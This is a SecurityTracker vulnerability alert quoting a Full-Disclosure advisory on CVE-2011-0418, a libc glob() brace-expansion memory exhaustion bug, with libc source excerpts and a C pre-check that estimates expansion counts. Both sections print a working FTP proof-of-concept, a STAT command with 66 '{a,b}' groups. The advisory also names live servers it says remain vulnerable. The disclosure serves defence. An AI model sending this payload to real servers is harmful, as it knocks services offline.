SecurityTracker.com

SecurityTracker Archives

Category:   Application (Generic)  >   libc
Vendors:   [Multiple Authors/Vendors]
libc glob() Function Lets Remote Users Consume All Available Memory
SecurityTracker Alert ID:  1025466
SecurityTracker URL:  http://securitytracker.com/id/1025466
CVE Reference:   CVE-2011-0418   (Links to External Site)
Date:  May 2 2011
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in libc. A remote or local user can cause denial of service conditions.

A remote or local user can supply a specially crafted pattern that expands to a very large number of matches, causing the glob() function to consume all available memory on the target system. With GLOB_BRACE, every additional '{a,b}' group doubles the number of candidate paths, so a pattern a few hundred bytes long drives an exponential number of allocations. The GLOB_LIMIT flag, which caps the memory used by stored matches, did not bound this brace expansion; the NetBSD fix adds a separate limit on the number of braces in a pattern.
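The doubling described above, as an added example that is not part of the original alert, of the advisory, or of NetBSD's libc: a pre-check that computes how many strings a GLOB_BRACE pattern would expand to (the product, over its brace groups, of the number of alternatives in each group, with nesting) so that a server such as ftpd can refuse the pattern before glob(3) allocates anything for it. It also shows the advisory's STAT argument saturating the counter. Everything in it is this example's own: the function names brace_expansions, brace_budget_check and repeat_ab_groups, the budget values, and the simplifications that an unmatched '{' is a literal, '\' escapes the next character, and bracket expressions are not treated specially. It is an estimator of the expansion rule, not a reimplementation of globexp1().

```c
/* Added example: estimate GLOB_BRACE expansion count before calling glob(3).
 * Not code from the advisory or from any libc. Rule modelled: a pattern's
 * count is the product over its top-level brace groups of the sum of the
 * counts of each alternative (alternatives may nest). Assumptions: an
 * unmatched '{' is a literal, '\' escapes one character, bracket
 * expressions get no special handling. All names are this example's own. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Saturating arithmetic: a count that does not fit in 64 bits is beyond any
 * sane budget, so clamp to UINT64_MAX instead of wrapping around. */
static uint64_t sat_add(uint64_t a, uint64_t b)
{
    return (b > UINT64_MAX - a) ? UINT64_MAX : a + b;
}

static uint64_t sat_mul(uint64_t a, uint64_t b)
{
    if (a != 0 && b > UINT64_MAX / a)
        return UINT64_MAX;
    return a * b;
}

/* Count expansions of the sequence at *pp. With in_group set the sequence is
 * one alternative and stops at the first ',' or '}' at this depth (left for
 * the caller); otherwise it runs to the end of the string. *pp is advanced
 * to where scanning stopped. */
static uint64_t count_seq(const char **pp, int in_group)
{
    const char *p = *pp;
    uint64_t product = 1;

    while (*p != '\0') {
        if (*p == '\\' && p[1] != '\0') {       /* escaped character */
            p += 2;
            continue;
        }
        if (in_group && (*p == ',' || *p == '}'))
            break;
        if (*p == '{') {
            const char *q = p + 1;
            uint64_t sum = 0;
            int closed = 0;

            for (;;) {                           /* one pass per alternative */
                sum = sat_add(sum, count_seq(&q, 1));
                if (*q == ',') {
                    q++;
                    continue;
                }
                if (*q == '}') {
                    q++;
                    closed = 1;
                }
                break;
            }
            if (!closed) {                       /* no matching '}' */
                p++;                             /* treat '{' as literal */
                continue;
            }
            product = sat_mul(product, sum);     /* groups multiply */
            p = q;
            continue;
        }
        p++;
    }
    *pp = p;
    return product;
}

/* Strings glob(3) with GLOB_BRACE would generate from pattern before it
 * matches any of them against the filesystem. */
uint64_t brace_expansions(const char *pattern)
{
    const char *p = pattern;
    return count_seq(&p, 0);
}

/* 0 if within budget, -1 if the pattern must be refused (the analogue of
 * glob(3) returning GLOB_NOSPACE under GLOB_LIMIT). */
int brace_budget_check(const char *pattern, uint64_t max_expansions)
{
    return brace_expansions(pattern) <= max_expansions ? 0 : -1;
}

/* n copies of "{a,b}", the shape of the advisory's STAT argument
 * (constructed here; static buffer, n capped at 200). */
const char *repeat_ab_groups(size_t n)
{
    static char buf[5 * 200 + 1];
    size_t i;

    if (n > 200)
        n = 200;
    for (i = 0; i < n; i++)
        memcpy(buf + 5 * i, "{a,b}", 5);
    buf[5 * n] = '\0';
    return buf;
}

int main(void)
{
    const char *samples[] = { "*.txt", "{a,b}{c,d,e}", "{a,{b,c}}", "{a,b" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s -> %llu expansions\n", samples[i],
               (unsigned long long)brace_expansions(samples[i]));
    /* 2^66 does not fit in 64 bits: the count saturates and is refused,
     * while a 10-group pattern (1024 expansions) passes the same budget. */
    printf("66 groups -> %d\n", brace_budget_check(repeat_ab_groups(66), 1u << 20));
    printf("10 groups -> %d\n", brace_budget_check(repeat_ab_groups(10), 1u << 20));
    return 0;
}
```

The check is cheap (one pass over the pattern, no allocation), which is the property a pre-filter in a network daemon needs; the budget should be chosen well below the process memory the server is prepared to spend on one request, and the caller should still pass GLOB_LIMIT on systems that provide it, since that flag bounds the matches found on disk while this check only bounds the candidate strings generated from the pattern.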

NetBSD is affected. Other operating systems may be affected.

Demonstration exploit code is available at:

http://cxib.net/stuff/glob-0day.c

A demonstration exploit (against NetBSD's ftpd) is provided:

USER anonymous
PASS bla@bla.bla
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

Maksymilian Arciemowicz reported this vulnerability.

The original advisory is available at:

http://securityreason.com/achievement_securityalert/97

Impact:   A remote or local user can cause denial of service conditions.
Solution:   NetBSD has issued a fix, available at:

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c

Cause:   Resource error
Underlying OS:  UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion

[ Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
 - Dis.: 19.01.2011
 - Pub.: 02.05.2011

CVE: CVE-2011-0418

Affected Software (verified):
- NetBSD 5.1
- and more

Original URL:
http://securityreason.com/achievement_securityalert/97


--- 0. Description ---
#include <glob.h>

int glob(const char *pattern, int flags,
         int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);

Description

This function expands a filename wildcard which is passed as pattern.

GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX. This
option should be set for programs that can be coerced to a denial of
service attack via patterns that expand to a very large number of
matches, such as a long string of */../*/..


--- 1. Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory
exhaustion ---
Analyzing the history of GLOB_LIMIT, we should start in 2001, when it
was added to protect ftp servers against memory exhaustion.

http://www.mail-archive.com/bugtraq@securityfocus.com/msg04960.html

Any 'pattern' should be limited and controlled by GLOB_LIMIT. The
algorithm used in glob(3) is not optimal, and doesn't support functions
like realpath() to eliminate duplicates. It's not easy to predict the
greatest possible complexity. Anyway, in 2010 NetBSD extended GLOB_LIMIT
with a few new limits, such as: stats, readdir and malloc.

OpenBSD has located some integer overflows. In the glob(3) function there
are some malloc() calls allowing allocation of n<INT_MAX bytes of memory.

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h

--globextend()/openbsd--
	newn = 2 + pglob->gl_pathc + pglob->gl_offs;
	if (pglob->gl_offs >= INT_MAX ||
	    pglob->gl_pathc >= INT_MAX ||
	    newn >= INT_MAX ||
	    SIZE_MAX / sizeof(*pathv) <= newn ||
	    SIZE_MAX / sizeof(*statv) <= newn) {
 nospace:
		for (i = pglob->gl_offs; i < (ssize_t)(newn - 2); i++) {
			if (pglob->gl_pathv && pglob->gl_pathv[i])
				free(pglob->gl_pathv[i]);
			if ((pglob->gl_flags & GLOB_KEEPSTAT) != 0 &&
			    pglob->gl_pathv && pglob->gl_pathv[i])
				free(pglob->gl_statv[i]);
		}
		if (pglob->gl_pathv) {
			free(pglob->gl_pathv);
			pglob->gl_pathv = NULL;
		}
		if (pglob->gl_statv) {
			free(pglob->gl_statv);
			pglob->gl_statv = NULL;
		}
		return(GLOB_NOSPACE);
	}
--globextend()/openbsd--

However, SIZE_MAX and INT_MAX don't protect us against memory
exhaustion. The real problem here is the uncontrolled malloc(3) call.
globextend() will be executed many times, and we should reduce the calls
to glob0() and globexp1(). Therefore a new limit has been created,
limiting the number of 'braces' used in 'pattern'.

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29

If we don't reduce this call

--globextend()/netbsd--
static int
globextend(const Char *path, glob_t *pglob, size_t *limit)
{
	char **pathv;
	size_t i, newsize, len;
	char *copy;
	const Char *p;

	_DIAGASSERT(path != NULL);
	_DIAGASSERT(pglob != NULL);

	newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);
	pathv = pglob->gl_pathv ? realloc(pglob->gl_pathv, newsize) :
	    malloc(newsize);	/* <==== INSECURE CALL */
...
--globextend()/netbsd--

newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);

malloc(3) tries to allocate (4*pglob->gl_pathc) bytes.

--PoC--
USER anonymous
PASS bla@bla.bla
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--PoC--

As a result we get:

Jan 19 04:49:17 127 /netbsd: UVM: pid 615 (ftpd), uid 1003 killed: out of swap

Many servers are still vulnerable to the above vulnerability and to
CVE-2010-4754, CVE-2010-4755, CVE-2010-4756 and CVE-2010-2632. Servers
like ftp.sun.com and ftp.sony.com seem to still be affected.


--- 2. References ---
http://securityreason.com/achievement_securityalert/89
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.asc
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.avaya.com/css/P8/documents/100127892
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4754
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4755
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4756
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0418

PoC:
change 'pattern' in
http://cxib.net/stuff/glob-0day.c


--- 3. Fix ---
Use CVS netbsd-5 netbsd-5-1 netbsd-5-0
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c


--- 4. Greets ---
Special thanks to Christos Zoulas, spz

sp3x, Infospec


--- 5. Contact ---
Author: Maksymilian Arciemowicz

Email:
- cxib {a\./t] securityreason [d=t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

-- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@cxib.net>
sub   4096R/58BA663C 2010-09-19

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Copyright 2021, SecurityGlobal.net LLC